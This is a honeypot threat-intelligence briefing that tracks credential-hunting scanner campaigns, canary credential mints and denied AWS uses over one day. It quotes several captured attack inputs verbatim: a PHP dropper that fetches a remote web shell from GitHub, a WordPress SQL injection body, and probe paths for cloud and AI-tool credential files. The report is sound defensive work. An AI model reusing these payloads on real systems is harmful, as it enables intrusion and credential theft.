FLUX FLEET — INTEL BRIEFING №13
Period: 2026-09-07 07:33 – 2026-09-08 07:32 UTC (24h digest window, day 12 of operations)
Sources: 3 honeypot nodes — canary-farm-1 (EU-hot), ai-devbox-1 (EU), control-1 (Middle East)
Confidence: High (direct observation; 12-day baseline, every result-tag spike attributed by spot query)
The digest window starts at the previous digest run time, and the +4 h timestamp cast widens the effective query window to ~03:33 UTC on 09-07. Events from 03:33 to 07:33 UTC on 09-07 appear in both this digest and №12's data. The new data starts at 07:33 UTC on 09-07. All times are UTC and quoted from the raw log timestamps. №12's tail (the 34.83.24.21 and 34.23.20.91 runs, the Oracle pair, the crusader control workers) was cross-checked against briefing №12 before this report counted anything as new.
BLUF
This was the fleet's quietest window since day 3: 10,496 events, because CRUSADER-SWEEP did not run and WP-LOGIN-BRUTE kept shrinking. METADATA-HUNT ran three new GCP runners and hit every node — the control runner 136.85.124.29 minted 17 credentials, the first control mints ever, and Tracebit recorded 26 denied Bedrock Converse uses minutes later, so the mint-to-use funnel now draws from all three nodes. NIGHTAGENT returned after its one-day break on a fifth Moroccan residential IP and minted 3 credentials, its first successful mints, with the same unrotated GHSAT token. GCP-ACONF completed a fleet-wide second run, and ORACLE-SWEEP ran a third time with a new one-IP-per-node trio and an expanded actuator/OpenAPI wordlist. No new campaign entered the fleet.
Key Judgements
- The canary funnel now draws from every node, and hostile use still buys nothing. Control runner 136.85.124.29 minted 17 credentials at 15:44–15:45 UTC on 09-07 (803 events, 578 paths, 12 POSTs) and Tracebit recorded 26 uses from one use IP — all denied, all
Converse. The farm runner 34.22.137.199 repeated the day-11 pattern exactly: 25 mints in 22 seconds, 34 denied uses. The aidev runner 34.104.212.213 drew 0 mints and 13 upstream 400s — aidev's mint path rejected its request shape, the same upstream rejection as №12's control runner. (High confidence — mints and uses both observed, joined on collector IP; three runners, three nodes, one template) - NIGHTAGENT crossed its first credentials and kept its token. 41.140.11.235 (Office National des Postes, MA — the fifth Moroccan residential IP in this lineage) ran the four-step loop on both EU nodes at 06:32–06:45 UTC on 09-08 and minted 3 (1 farm, 2 aidev) — the kit's first mints after three dry runs. The dropper body is verbatim:
<?php copy('https://raw.githubusercontent.com/nightagents/nightshell/refs/heads/main/night.php?token=GHSAT0AAAAAACYWDMT5UQIYLJJSWO5KVDNIZYGPEDA','night.php');readfile('night.php'); ?>. The GHSAT token is still the one first captured on №9. (High confidence — full journey and body observed; the token is now a five-window continuity fingerprint) - GCP-ACONF is a standing template with fleet reach. The 93-path AI-config census ran twice more, one fresh GCP IP per node: 34.97.47.229 on aidev at 05:42 UTC and 34.94.37.42 on farm at 11:31 UTC, each 93 events in under one second, zero mints. With №12's control run, the list has now touched all three nodes. (High confidence — identical path inventories confirmed by spot query; three runs, three nodes, same sub-second burst shape)
- ORACLE-SWEEP went fleet-wide with a bigger wordlist. A new Oracle trio ran one node each: 140.245.96.64 on aidev (09:54 UTC on 09-07, 50 events, 1 mint), 140.245.108.60 on farm (08:38 UTC, 18 events, 1 mint), 140.245.108.219 on control (00:34 UTC on 09-08, 37 events, 1 mint). All three used the forged
Chrome/126UA. The list grew past.envvariants: Spring actuator endpoints (/actuator/env,/actuator/jolokia,/actuator/flyway), OpenAPI specs (/v2/api-docs,/swagger.json,/openapi.json), SQL dumps (/dump.sql,/backup.sql), and literal PostgreSQL URIs of the form/postgresql:/prod_rw:<22-char password>@db.internal:5432/prodwith new rotating passwords. (High confidence — UA, census shape, and the prod_rw URI family match the №11–№12 lineage; the actuator and OpenAPI families are new stages)
Active Campaigns (day 12 status)
Recurring campaigns carry ⟳ and their registry names. First-seen signatures carry ⚠ NEW. Signatures, not IPs, are the campaign identity.
⟳ METADATA-HUNT (GCP Vite/IMDS template, forged crawler UAs) — hostile, seventh consecutive GCP day, 42 new mints
- Actors: Four runners this window. New: 34.22.137.199 (Google LLC, BE) on farm — 839 events, 609 paths, 12 POSTs, 25 mints, zero 400s, 17:26–17:27 UTC on 09-07, 462 distinct UAs. New: 136.85.124.29 (Google LLC, SG) on control — 803 events, 578 paths, 12 POSTs, 17 mints, zero 400s, 15:44–15:45 UTC. New: 34.104.212.213 (Google LLC, JP) on aidev — 777 events, 601 paths, 12 POSTs, 0 mints, 13 × 400, 03:43 UTC on 09-08. №12 tail, not recounted: 34.83.24.21 (farm, 25 mints) and 34.23.20.91 (control, 0 mints, 21 × 400).
- TTPs: The template is unchanged:
/__aws_leak_probe_<hex>__,/@fs/proc/self/environ,/@fs/home/ec2-user/.aws/credentials,/.azure/credentials,/.mcp.json,/.env.local. The farm and control runners rotated the forged crawler UA set per request — the farm runner's 462 distinct UA strings addedClaude-SearchBot,meta-externalagent,Perplexity-User,ChatGPT-User,Discordbot,Slackbot-LinkExpanding,WhatsApp, andLinkedInBotto the №11–№12 set. The aidev runner carried a new Vite path:/@fs/proc/self/cwd/.config/gcloud/application_default_credentials.json. - Assessment: Three runners, three nodes, one day — the operator now probes the whole fleet before the use phase. Control minted for the first time, so the fleet's weakest node feeds the funnel too. Every observed use is still a denied Bedrock
Converse. Watch for asts:GetCallerIdentitysuccess and forConverseretries that switch region or model; those are the escalation lines.
⟳ NIGHTAGENT (residential MA, phpunit dropper kit) — hostile, returned after one idle day, first mints
- Actors: 41.140.11.235 (Office National des Postes, MA) on both EU nodes, 06:32–06:45 UTC on 09-08. Farm: 104 events, 9 POSTs, 1 mint. Aidev: 172 events, 18 POSTs, 2 mints. The lineage now covers five MA residential IPs across four days of runs.
- TTPs: The four-step loop, twice per node: phpunit verify with body
<?php echo "NightAgent"?>, dropper to/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php(full body in Key Judgement 2),.git/config+.git/index+.DS_Storecensus, then/whm,/openid_connect/cpanelid,/login/with bodyuser=root&pass=wrong, and wp-batch multiplex with body{"requests": [{"method": "POST", "path": "///"}, .... UA rotation between stale Chrome/105–107, Firefox/105–106, andpython-requests/2.32.5. - Assessment: The kit's daily cadence resumed after one idle window, and the mint attempts finally succeeded — 3 credentials are now hostile-held inventory from this operator. Tracebit recorded no AWS use from them yet. The token and repo remain the search indicator; the token has survived six windows unrotated.
⟳ GCP-ACONF (AI/LLM config census) — hostile, second run, now fleet-wide, zero mints
- Actors: 34.97.47.229 (Google LLC) on aidev, 05:42 UTC on 09-07, 93 events in 0.4 s. 34.94.37.42 (Google LLC) on farm, 11:31 UTC, 93 events in 0.3 s. №12's 34.106.12.203 covered control. Zero mints on both new runs.
- TTPs: The unchanged 93-path list:
/.aider.env,/.aider.conf.yml,/.aider.model.settings.yml,/.anthropic,/.auth.json,/.vscode/mcp.json,/.claude/mcp.json,/mcp_config.json,/.continue/config.yaml,/.windsurf/mcp.json,/.cursor/config.json, plusclaude-credentials,gcp-credentials-json,sql-dump, andbackup-archivetrap families. PlainChrome/124-era forged browser UAs, no crawler strings. - Assessment: Three runs, three nodes, no mints — the census is a standing probe, not a thief. The farm first-seen AI-config paths (
/.vscode/mcp.json,/.claude/mcp.json,/mcp_config.json) are this run's inventory. The template validates the AI-surface traps: it walks every MCP and assistant config path the fleet baits.
⟳ ORACLE-SWEEP (.env/actuator/OpenAPI census) — hostile, third run, first fleet-wide run, 3 mints
- Actors: One Oracle IP per node, all with the forged
Chrome/126.0.0.0Windows UA: 140.245.96.64 on aidev (09:54 UTC on 09-07, 50 events, 1 mint), 140.245.108.60 on farm (08:38 UTC, 18 events, 1 mint), 140.245.108.219 on control (00:34 UTC on 09-08, 37 events, 1 mint). №12's pair (161.118.243.214, 168.107.91.14) sits in the overlap band and is not recounted. - TTPs: The new list adds Spring actuator endpoints (
/actuator/env,/actuator/jolokia,/actuator/threaddump,/actuator/flyway,/actuator/logfile), OpenAPI specs (/v2/api-docs,/swagger/v1/swagger.json,/api-docs), SQL dumps (/dump.sql,/backup.sql), and literal PostgreSQL URIs:/postgresql:/prod_rw:eqsVSq3g_JA68258eiCK_w@db.internal:5432/prodon aidev and/postgresql:/prod_rw:TWU4wxZshuEF2-bHKRaNww@db.internal:5432/prod— both GETs, bothnot-handled. - Assessment: The
prod_rwURI family links this template to the INFOCREST-KIT credential lineage: INFOCREST POSTsprod_rwcredentials to adminer, and ORACLE-SWEEP GETsprod_rwURIs. The 22-character passwords rotate per request in both. The evidence shows two templates that share a credential corpus, not one actor. The actuator and OpenAPI families are new stages, so the fourth run decides whether this list keeps growing.
⟳ INFOCREST-KIT (phpMyAdmin/adminer/wp-batch census) — hostile, fourth operator IP, no adminer POSTs this run
- Actors: 104.36.50.16 (HostRoyale Technologies, US — the same hosting as №12's second operator 185.141.119.179) on both EU nodes, 17:30–21:35 UTC on 09-07. Farm: 331 events, 21 POSTs, 0 mints. Aidev: 331 events, 21 POSTs, 1 mint. Sixteen rotating UAs: stale Chrome/105–107, Firefox/105–106, Safari/16, and
python-requests/2.32.5. - TTPs: Tarpit cycling → phpMyAdmin spelling census →
.git/configand.git/index→.DS_Store→ config-bundle JS census (thephpinfo-errorandsymfony-parameters-yml-erroraidev spikes are 12 and 15 events from this IP) →/login/with bodyuser=root&pass=wrong→ wp-batch multiplex with the SQLi body verbatim:{"requests": [{"method": "POST", "path": "///"}, {"method": "POST", "path": "/wp/v2/posts", "body": {"requests": [{"method": "POST", "path": "///"}, {"method": "GET", "path": "/wp/v2/posts/999999?author_exclude=0%29+UNION+SELECT+999999%2C2%2C0x323032302d30312d30312030303a30303a3030.... No adminer credential POSTs this run — the first INFOCREST-shaped run without them. - Assessment: Fourth operator, same anatomy minus adminer, and the same hosting provider as run two. The wp-batch SQLi body is byte-identical to №12's, so the kit circulates unchanged. The missing adminer stage and the 4-hour multi-node spread are the two deltas to check on the next run.
⟳ CREDSWEEP family (.env-variant census) — hostile, one escalation, two new operators
- Actors: 45.148.10.238 (Techoff Srv, NL) ran its third consecutive window, now on both remaining nodes in one day: aidev 08:16–08:20 UTC (375 events, 175 paths, 2 mints) and control 12:19–12:21 UTC (660 events, 273 paths, 1 mint). Eleven all-time mints, and the 10-UA rotation with the
Mozlila/5.0typo forgery is intact. New operator 102.220.161.87 (VPS Dedicated LLC, SI) ran a 512-path directory-fanout census on aidev over 3 hours (23:07 UTC on 09-07 to 02:17 UTC on 09-08):/vendor/.env,/lib/.env,/lab/.env,/cronlab/.env,/cron/.env,/core/Datavase/.env,/database/.env,/saas/.env,/exapi/.envand roughly 500 more, with apscan-b6aa4206-nonexistent.txt404 probe, 2 mints. New operator 34.74.198.14 (Google LLC, US) ran a 272-path.env-variant and phpinfo census on farm in 68 seconds (17:42 UTC, 285 events, 0 mints, forgedChrome/131UA) — a GCP one-off in CREDSWEEP shape. Returned one-offs: 84.21.173.161 (farm, 24 events, 6 UAs, 1 mint, 13:00 UTC), 185.169.252.18 (Contabo FR, aidev, 143 events/91 paths in 32 seconds, staleChrome/39UA, 1 mint, 17:18 UTC), 213.209.159.175 (Feo Prest /24, farm, 114 events/112 paths in 6 seconds, Android Facebook-in-app UA, 0 mints, 21:46 UTC). Trace presence: 91.245.74.31 (8 events — fifth consecutive day, no census this time), 176.65.148.71 (2 events). - TTPs: Exhaustive
.env-variant and credential-file walks, one mint path each. The fanout operator 102.220.161.87 is the first CREDSWEEP actor to spend three hours on one node — every prior census ran in minutes. - Assessment: The template keeps recruiting operators faster than the fleet retires them: two new hosting providers this window, one of them GCP. The 45.148.10.238 escalation is now a three-window, three-node arc — it is the most persistent hostile actor in the fleet after the GCP templates.
⟳ GIT-VAULT (git-internals walk) — hostile, new operator on control, 1 mint
- Actors: 128.24.167.75 on control-1, 10:02–10:04 UTC on 09-07. 62 events, 13 rotating UAs: an honest
git/2.39.0for the git stages, then 12 forged browser UAs and a forgedGooglebot/2.1. - TTPs:
.gitinternals walk with real object hash fetches:/.git/index,/.git/packed-refs,/.git/refs/heads/main,/.git/logs/HEAD,/.git/objects/pack/, and six/.git/objects/<2-char>/<38-char>paths. One mint at the credential stage. - Assessment: First GIT-VAULT run on control and the first run that fetched git object hashes instead of only refs — the operator pulled actual object files from the fake repository. The
git/2.39.0UA is a new continuity fingerprint for this template.
⟳ REGISTRY-HUNT (LeakIX) — borderline, evening wave intact, 5 mints
- Actors: Five
l9scanIPs in the evening wave, 20:16–20:31 UTC on 09-07: 142.93.129.190, 46.101.1.225, 159.223.132.86, 157.245.113.227 on farm; 207.154.197.113 on aidev. DigitalOcean rotating IPs, 41 events each, 1 mint each. - TTPs: The fixed WebLogic → Confluence → WHM → Docker-registry journey, unchanged.
- Assessment: Twelfth consecutive day at the same hour. LeakIX remains a collector that mints; report it, distinguish it from criminal actors.
⟳ WP-LOGIN-BRUTE (distributed credential brute) — hostile, kept shrinking
- Actors: 66 IPs on the two EU nodes, 84 credential POSTs with 84 distinct bodies, spread across the whole window. Forged browser UAs, node-aware pair corpus unchanged.
- Assessment: Volume fell 113 → 84 pairs. No mints. The brute is background noise; the growth alarm threshold stays at 200 pairs per window.
⟳ MALWARE-DICT (dropper-URL dictionary replay) — hostile, returned under a new operator after 8 days
- Actors: 204.76.203.18 (Pfcloud UG, NL, blocklist ipsum:2) on control, 05:02–07:32 UTC on 09-08. 238 events, 236 paths, all GETs, 0 mints. The registry listed this IP as departed; it returned with new behavior.
- TTPs: Dropper-URL dictionary, URLhaus-style:
/bins/morte.arm6,/bins/morte.i686,/bins/morte.x86_64,/bins/sora.spc,/hiddenbin/boatnet.sh4,/hiddenbin/boatnet.x86_64,/hiddenbin/Space.arm7,/00101010101001/morte.arm6,/systemcl/spc,/bot.arm7, and hash-named binaries like/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86. The replayed URLs name IoT botnet dropper families (Morte, Boatnet, Sora). - Assessment: The №3–№4 template returned under a different operator and a different node. The dictionary is now ~581 paths strong. The fleet served 404s; the replay validates the fleet as a mirror for feed-driven scanning, not a live host.
⟳ OMEGA-SWEEP (Omegatech /24) — hostile, pool probes only, hoard unchanged
- Actors: Pool probes on aidev: 94.154.43.105 (9 events), 94.154.43.146, 94.154.43.180, 94.154.43.135 (1 event each), 94.154.43.43 (1 event, 1 mint at
/.env, bareMozilla/5.0UA). No census operator ran. - Assessment: The .43.x probe pool grew to 21 known IPs. The .243 hoard (71 canaries, 8 days, zero AWS use) and the /46 block's 90 unused canaries are unchanged. Tracebit shows no use from any 94.154.46.x-collected credential.
⚠ CRUSADER-SWEEP — idle, second consecutive window
No crusader-worker/1.0 core-list wave and no Firefox/78 git-mirror class ran. The 06:00 UTC wave missed its slot for the first time since №10. The aidev volume collapse (−84%) is this absence plus the №12 overlap tail leaving the window.
Standing actors (persistence check)
- 45.148.10.238 (Techoff Srv, NL) — third consecutive window, both aidev and control in one day, 3 mints this window, 11 all-time. The
Mozlila/5.0typo forgery is intact. Volume trend: up, node count: 3 of 3 covered in three windows. - 91.245.74.31 (PC Astra-net) — fifth consecutive day, but only 8 events this window; the promotion trigger (a >500-event census on a second node) did not fire.
- 80.94.95.211 (SS-Net, RO) — sixth window in seven: aidev, 51 events, 1 mint, 8 all-time. MSIE 9 and Mail.RU_Bot UAs.
- 89.248.171.24 / 89.248.172.14 — the uptime-prober pair grew: 312 events across all 3 nodes over 23 hours (paths
/,/aaa9,/aab9, aiohttp), plus 2 events on the sibling. Benign-shape, report only. - 16.5.0.236 (
Hello WorldUA) — SOHO-router probes continue on all 3 nodes, 32 events. - 93.174.93.12 — the
/-handshake fixture, 27 events, unchanged. - 129.213.151.234 (
research-scan/1.0) — farm, 41 events, 1 mint at/.env(№12's run sits in the overlap band; this window adds the mint record). Borderline honest-UA collector. - New
/-only probers: 89.248.172.33 (aiohttp, 27 events, 3 nodes), 91.224.92.135 (27), 185.218.86.25 (18), 195.182.16.23 (19), 146.190.134.221 (9), 144.202.92.17 (CyberConvoyScout/1.0, 15). All/-handshake only, no mints. Benign-shape. - Absent this window: 213.209.159.154 (first absence after three windows; its /24 sibling 213.209.159.175 ran instead), 192.253.248.173, 194.180.49.37 (third), 182.8.227.195, 94.154.46.247, 91.92.241.215, 176.65.148.226, the Hetzner IPv6 git walker.
Benign / research (not hostile)
- Censys — the odd first-seen control and farm paths (
/security.txt,/zxagimz1r,/uorzragcz1a6_tron3) are Censys inventories, not attack paths. - CyberConvoyScout/1.0 (144.202.92.17) — new honest-UA banner prober,
/-only, 15 events. Add to the benign list. - No hostile journeys from Censys, Palo Alto, zgrab, OAI-SearchBot standalone, ModatScanner, or ivre-masscan this window. The
OAI-SearchBotstring appeared only inside METADATA-HUNT's forged rotation.
Canary credentials
Summary
60 Tracebit alert(s) fired in the window (62 use events across 60 credentials). Fleet sensors minted 70 credentials to 25 collector IPs; 60 credential(s) reached AWS.
Use outcomes: 62 failure.
Denied operations: Converse×62.
0 call(s) succeeded: . Successes leak identity at most; treat any success beyond sts:GetCallerIdentity as a finding.
Mint → use funnel
| Metric | Count |
|---|---|
| Credentials minted (fleet, window) | 70 |
| Distinct collector IPs | 25 |
| Credentials used in AWS (alerts) | 60 |
| Credentials stolen, no observed AWS use in window | 10 |
Per collector (evidence for attribution prose — join each IP against ip-journey and the campaign registry):
| Theft IP | Sensor | Mints (window) | Creds used in AWS | Use IPs | Operations | Mint history (6d) |
|---|---|---|---|---|---|---|
34.22.137.199 |
canary-farm-1 | 25 | 34 | 1 | Converse | 25 mints since 2026-09-07 17:26 |
136.85.124.29 |
control-1 | 17 | 26 | 1 | Converse | 17 mints since 2026-09-07 15:44 |
102.220.161.87 |
ai-devbox-1 | 2 | 0 | 0 | — | 2 mints since 2026-09-07 23:07 |
41.140.11.235 |
ai-devbox-1 | 2 | 0 | 0 | — | 3 mints since 2026-09-08 06:34 |
45.148.10.238 |
ai-devbox-1 | 2 | 0 | 0 | — | 11 mints since 2026-09-03 13:30 |
104.36.50.16 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-07 18:30 |
128.24.167.75 |
control-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-07 10:02 |
129.150.39.236 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-08 00:18 |
134.185.90.18 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-08 00:42 |
140.245.108.219 |
control-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-08 00:33 |
140.245.108.60 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-07 08:38 |
140.245.96.64 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-07 09:54 |
142.93.129.190 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-07 20:16 |
144.172.93.238 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-07 10:37 |
157.245.113.227 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-04 20:27 |
159.223.132.86 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-07 20:30 |
185.169.252.18 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-07 17:18 |
207.154.197.113 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-07 20:28 |
34.18.71.97 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-07 22:14 |
35.185.244.160 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-07 07:42 |
35.221.59.195 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-07 11:31 |
41.140.11.235 |
canary-farm-1 | 1 | 0 | 0 | — | 3 mints since 2026-09-08 06:34 |
45.148.10.238 |
control-1 | 1 | 0 | 0 | — | 11 mints since 2026-09-03 13:30 |
46.101.1.225 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-03 19:55 |
80.94.95.211 |
ai-devbox-1 | 1 | 0 | 0 | — | 8 mints since 2026-09-01 23:37 |
84.21.173.161 |
canary-farm-1 | 1 | 0 | 0 | — | 3 mints since 2026-09-06 22:19 |
94.154.43.43 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-07 17:12 |
Persistent collectors with no observed AWS use (candidates for hoard/resale/untraced use — check prior briefings for named campaigns):
94.154.46.243: 71 mints, 2026-09-01 12:13 → 2026-09-04 03:42104.196.118.131: 25 mints, 2026-09-06 03:25 → 2026-09-06 03:2534.83.24.21: 25 mints, 2026-09-07 05:10 → 2026-09-07 05:1094.154.46.247: 18 mints, 2026-09-03 17:01 → 2026-09-06 19:02194.180.49.37: 16 mints, 2026-09-01 06:00 → 2026-09-04 17:18207.175.90.192: 13 mints, 2026-09-03 07:50 → 2026-09-03 07:5034.38.121.96: 13 mints, 2026-09-03 09:30 → 2026-09-03 09:3034.74.98.8: 13 mints, 2026-09-01 09:19 → 2026-09-01 09:19196.206.35.222: 12 mints, 2026-09-04 04:09 → 2026-09-04 08:2694.154.46.244: 12 mints, 2026-09-03 11:42 → 2026-09-03 11:4294.154.46.249: 12 mints, 2026-09-02 13:07 → 2026-09-02 13:0834.23.228.150: 11 mints, 2026-09-04 21:35 → 2026-09-04 21:3545.148.10.238: 11 mints, 2026-09-03 13:30 → 2026-09-07 12:1987.120.104.29: 11 mints, 2026-09-04 05:06 → 2026-09-04 05:0694.154.46.248: 10 mints, 2026-09-02 12:43 → 2026-09-02 12:43136.85.12.249: 8 mints, 2026-09-05 09:28 → 2026-09-05 09:2880.94.95.211: 8 mints, 2026-09-01 23:37 → 2026-09-07 21:0891.245.74.31: 7 mints, 2026-09-04 10:52 → 2026-09-06 21:3023.165.56.117: 6 mints, 2026-09-02 22:58 → 2026-09-03 05:1541.142.109.20: 6 mints, 2026-09-05 05:09 → 2026-09-05 05:4772.167.41.202: 6 mints, 2026-09-04 18:22 → 2026-09-04 18:22167.99.182.39: 4 mints, 2026-09-01 20:50 → 2026-09-05 20:41182.8.227.195: 4 mints, 2026-09-04 21:16 → 2026-09-06 23:30185.141.119.179: 4 mints, 2026-09-05 10:17 → 2026-09-05 10:2631.57.219.158: 4 mints, 2026-09-06 13:11 → 2026-09-06 13:2394.154.46.250: 4 mints, 2026-09-01 15:55 → 2026-09-01 15:56130.12.180.77: 3 mints, 2026-09-02 00:04 → 2026-09-02 00:07139.59.136.184: 3 mints, 2026-09-02 15:14 → 2026-09-06 20:35164.92.107.174: 3 mints, 2026-09-03 20:39 → 2026-09-05 20:23167.71.175.236: 3 mints, 2026-09-02 20:10 → 2026-09-05 20:38185.177.72.53: 3 mints, 2026-09-03 03:26 → 2026-09-03 03:26213.209.159.154: 3 mints, 2026-09-01 09:55 → 2026-09-06 05:5241.140.11.235: 3 mints, 2026-09-08 06:34 → 2026-09-08 06:4584.21.173.161: 3 mints, 2026-09-06 22:19 → 2026-09-07 13:0091.92.241.215: 3 mints, 2026-09-04 01:31 → 2026-09-04 08:1591.92.41.55: 3 mints, 2026-09-01 07:53 → 2026-09-02 14:41
Canary-use attribution (briefing prose)
Two mint-to-use pipelines ran this window and both died at the same wall: 34.22.137.199's 25 farm credentials drew 34 denied Converse calls, and 136.85.124.29's 17 control credentials drew 26 more — both from single use IPs, both same-minute. Control minted for the first time and its credentials reached AWS within minutes, so the funnel no longer depends on the EU nodes. NIGHTAGENT's 3 credentials, ORACLE-SWEEP's 3, and CREDSWEEP's 4 are hostile-held inventory with no observed use: the silent count is 10 for the window. The standing hoards are unchanged — 94.154.46.243 still holds 71 credentials at 8 days with zero use, and the /46 block holds 90.
Fleet Observations
- Canary economics: Digest-window mints 101 (farm 61 / control 24 / aidev 16), all
["aws"]— control's first double-digit day. The true new window holds 70 mints to 25 collectors. All-time: 702 credentials to 266 collector IPs (farm 301, aidev 261, control 140). Mint failures: 55 × 400 (aidev 24, control 21, farm 10), zero 401s. Root cause is upstream rejection of rapid-retry request shapes, not key state: 34.23.20.91 drew 13, 34.104.212.213 drew 13, 136.85.124.29 drew 8, 104.36.50.16 drew 10 — the same operators whose mint attempts raced the burst limiter. - XFF forgery: 0 multi-entry chains, 0 empty-clientIp rows — eleventh consecutive clean day post-fix. 1,215 requests carried single-entry XFF.
- TLS/attribution posture: Farm served 779 https events on
sso.rightabouteverything.showterritory (1,006 Host-header events), aidev 284 https oninference.fapthropic.com(581 Host-header events). Control stayed deliberately certless: 0 https. The Contabo rDNS Hostvmi3177282.contaboserver.netcarried 382 aidev events. A new oddity appeared: 152 aidev events arrived withHost: 127.0.0.1from 21 scattered IPs (/.aws/*,/.env*probes) — origin-spoofing probes against a reverse-proxy assumption. They minted nothing. - Volume: Digest window 10,496 events (farm 3,751 −46% / aidev 3,369 −84% / control 3,376 −35%) — the quietest window since day 3. The aidev collapse is CRUSADER-SWEEP's absence: №12's 50,112-event git-mirror class did not return. Every ≥50-event hour attributed: control 06:00 (883) = №12's overlap tail (34.23.20.91, the Oracle pair, crusader control workers); farm 05:00 (877) = №12's 34.83.24.21; control 15:00 (816) = 136.85.124.29; farm 17:00 (1,248) = 34.22.137.199 (839) + 34.74.198.14 (285) + 104.36.50.16's farm leg (109) + 185.169.252.18; control 12:00 (664) = 45.148.10.238; aidev 03:00 (806) = 34.104.212.213 (777).
- Control discovery velocity: Day-12 ramp reads 39 → 70 → 88 → 107 → 105 → 105 → 100 → 98 → 99 → 108 → 120. Unique IPs set a new record (120) on 3,376 events. The differential dataset continues: the fresh IP now draws more distinct visitors than events per visitor, which is the steady state of a well-discovered node.
- First-seen inventory (not a timeline): Farm's new AI-config paths (
/.vscode/mcp.json,/.claude/mcp.json,/mcp_config.json) are GCP-ACONF's farm run. Control's new actuator/OpenAPI and.envpaths (/v2/.env,/api2/.env,/platform/.env,/tests/.env,/cgi-bin/.env) are ORACLE-SWEEP's trio. Aidev's new paths split between 102.220.161.87's fanout (/public/phpinfo.php,/configs.json.bak), 140.245.96.64 (/postgresql:/prod_rw:TWU4wxZshuEF2-bHKRaNww@...), and 34.104.212.213 (/@fs/proc/self/cwd/.config/gcloud/application_default_credentials.json). Censys owns/security.txt,/zxagimz1r, and/uorzragcz1a6_tron3. New UAs are forged strings inside the census operators' rotations, plus the first appearance of the truncatedChrome/12string on aidev. No new tooling family entered the fleet. - Digest quirks (all re-confirmed this run): control-byte-stripped copy needed for UTF-8 reads of the digest; +4 h timestamp cast; single-writer DuckDB lock (all spot queries ran sequentially); sync-arrival first-seen stamps; window overlap with №12 cross-checked — the 34.83.24.21/34.23.20.21 runners, the Oracle №12 pair, and the crusader control workers are №12 data seen again.
- Infrastructure: no fleet-side changes this cycle.
Gaps / Next Collection
- METADATA-HUNT use-phase escalation — 60 of 70 window credentials reached AWS and every call was a denied
Converse. The watch items are asts:GetCallerIdentitysuccess andConverseretries that switch region or model. A third runner cycle on aidev would also show whether the 13 × 400s are shape-specific or node-specific. - NIGHTAGENT's first stolen credentials — the kit minted 3 and Tracebit has not seen them used. Check Tracebit for use outside the log window; the kit holds the only hoard that also drops remote-shell code, so its credentials carry a higher risk of hands-on use.
- ORACLE-SWEEP wordlist growth — the third run added actuator, OpenAPI, and SQL-dump families to the
.envcore. Diff the fourth run's list against this one; a second growth step confirms an active development cycle. Also check whether the rotatingprod_rwURI passwords ever repeat a password seen in INFOCREST-KIT's adminer POSTs — a repeat merges the two lineages. - CRUSADER-SWEEP absence — the 06:00 UTC wave missed two consecutive windows after six on-schedule runs. Confirm whether the worker pool retired or paused; a return with POST capability moves the git-mirror class from staging to theft.
- Pfcloud dictionary replay — 204.76.203.18 replayed ~581 dropper URLs on control. Correlate the dictionary against a current URLhaus or MalwareURLs feed to date the list; the hash-named paths suggest a specific botnet build campaign.
- 91.245.74.31 promotion trigger — fifth consecutive day but only 8 events this window. The trigger stays at a >500-event census on a second node.
Generated on medina (headless systemd run). Digest: /data/flux-logs/reports/flux-digest-2026-09-08.md. Spot queries: flux-query.sh fleet-24h, crossnode-reuse, mint-health, mint-collectors, ip-journey (41.140.11.235), plus 9 ad-hoc v_full queries (window actor profile, spike attribution, GCP runner roster, minting-IP roster, standing-actor presence, adminer-body check, Oracle trio journeys, GCP-ACONF path inventories, Host-127.0.0.1 probe set) and the Tracebit canary-section generator.